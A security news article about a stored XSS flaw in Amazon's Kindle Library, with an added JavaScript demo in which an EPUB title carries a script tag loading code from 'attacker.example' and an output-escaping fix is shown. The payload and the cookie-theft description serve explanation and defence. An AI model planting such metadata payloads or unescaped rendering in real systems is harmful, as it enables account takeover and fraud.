Malicious Kindle Ebook Could Let An Attacker Take Over Your Amazon Account


If you come across a Kindle e-book download link from a suspicious source, or anywhere other than Amazon itself, think twice before you download it: simply adding such an e-book to your Kindle Library could put your personal information at risk.

A security researcher has uncovered a vulnerability in Amazon’s Kindle Library that can lead to cross-site scripting (XSS) attacks and account compromise when a malicious e-book is uploaded to it.

The flaw affects the “Manage Your Content and Devices” and “Manage your Kindle” services in Amazon’s web-based Kindle Library. It allows an attacker to inject and hide malicious code in e-book metadata, such as the title of an e-book, which the library page then renders without sanitising it, putting the security of your Amazon account at risk.

Gaining access to your Amazon account is one of the biggest boons for attackers: they can add new payment cards to your account or max out the ones already on file with large Amazon purchases. They can also use the credentials and personal information held in your Amazon account to compromise your other online accounts.


“Malicious code can be injected via ebook metadata; for example, an ebook’s title,” wrote Mr Mussler on his personal blog, adding that “the code will be executed as soon as the victim opens the Kindle Library web page. As a result, Amazon account cookies can be accessed by and transferred to the attacker and the victim’s Amazon account can be compromised.”
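The mechanism Mussler describes, shown as an added example: the title is pulled out of an e-book’s metadata and written into the library page without escaping, so the browser executes it as markup. This is illustrative code written for this article, not Amazon’s library code and not Mussler’s proof of concept; the OPF snippet, the attacker hostname `attacker.example` and every function name are constructed for the demonstration.

```javascript
// Added example: stored XSS through e-book metadata, and the one-line change
// that neutralises it. Not Amazon's code or the researcher's proof of concept;
// the package document, the hostname and the function names are constructed.

// A constructed EPUB package document (content.opf). The payload inside
// <dc:title> is XML-escaped, so the file is perfectly valid XML; it only
// becomes markup once the decoded title is written into an HTML page.
const MALICIOUS_OPF = `<?xml version="1.0" encoding="UTF-8"?>
<package xmlns="http://www.idpf.org/2007/opf" version="3.0">
  <metadata xmlns:dc="http://purl.org/dc/elements/1.1/">
    <dc:title id="t1">&lt;script src=&quot;https://attacker.example/k.js&quot;&gt;&lt;/script&gt;</dc:title>
    <dc:creator>Anonymous</dc:creator>
  </metadata>
</package>`;

// A harmless title for comparison, with a character that must survive escaping.
const BENIGN_OPF = `<package xmlns="http://www.idpf.org/2007/opf">
  <metadata xmlns:dc="http://purl.org/dc/elements/1.1/">
    <dc:title>Alice &amp; Bob Go Fishing</dc:title>
  </metadata>
</package>`;

// Decode the five predefined XML entities (what an XML parser would do for us).
function decodeXmlEntities(s) {
  const map = { lt: '<', gt: '>', quot: '"', apos: "'", amp: '&' };
  return s.replace(/&(lt|gt|quot|apos|amp);/g, (_, name) => map[name]);
}

// Pull the title out of the package document. A real importer would use an
// XML parser; a regex is enough to show where the attacker-controlled string
// comes from. Returns null when there is no title element.
function extractTitle(opfXml) {
  const m = /<dc:title(?:\s[^>]*)?>([\s\S]*?)<\/dc:title>/.exec(opfXml);
  return m ? decodeXmlEntities(m[1]) : null;
}

// Vulnerable rendering: the title is concatenated straight into the page,
// so a title of <script src="https://attacker.example/k.js"></script> loads
// and runs the attacker's script with the victim's Amazon session.
function renderRowUnsafe(title) {
  return `<tr><td class="title">${title}</td></tr>`;
}

// Hardened rendering: every HTML metacharacter is escaped on output, so the
// browser shows the payload as literal text and never fetches attacker.example.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return s.replace(/[&<>"']/g, (ch) => map[ch]);
}

function renderRowSafe(title) {
  return `<tr><td class="title">${escapeHtml(title)}</td></tr>`;
}

// Check a test suite can run over rendered markup: does the row contain an
// element the browser would execute?
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// Stand-alone demonstration of both the malicious and the benign title.
function main() {
  for (const opf of [MALICIOUS_OPF, BENIGN_OPF]) {
    const title = extractTitle(opf);
    const unsafe = renderRowUnsafe(title);
    console.log('title      :', title);
    console.log('unsafe row :', unsafe, containsScriptTag(unsafe) ? '<- XSS' : '');
    console.log('safe row   :', renderRowSafe(title));
  }
}

main();
```

In the real attack the script fetched from the attacker’s host would read `document.cookie` and send it to the attacker, exactly as the quote above describes. Escaping at output is the fix for the injection itself; marking session cookies `HttpOnly` would blunt cookie theft, but the injected script could still drive the victim’s logged-in session directly, so it is a mitigation rather than a substitute.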

According to Mr Mussler, Amazon already had his proof-of-concept attack code from its earlier testing of the Manage your Kindle page, yet an apparent oversight means the exploit still works. Users who stick to e-books sold and delivered by Amazon are safe.

Thankfully, the exploit only affects users who upload e-books obtained from dubious sources, such as pirated copies, to their Kindle Library, so there is no need to worry about adding an e-book to your Amazon shopping cart any time soon.


William Fieldhouse

I currently work full time as a penetration tester and have been involved within the IT security industry for over a decade. I also love to pioneer any forms of new technology and ideologies for future advancements. Feel free to contact me at [email protected]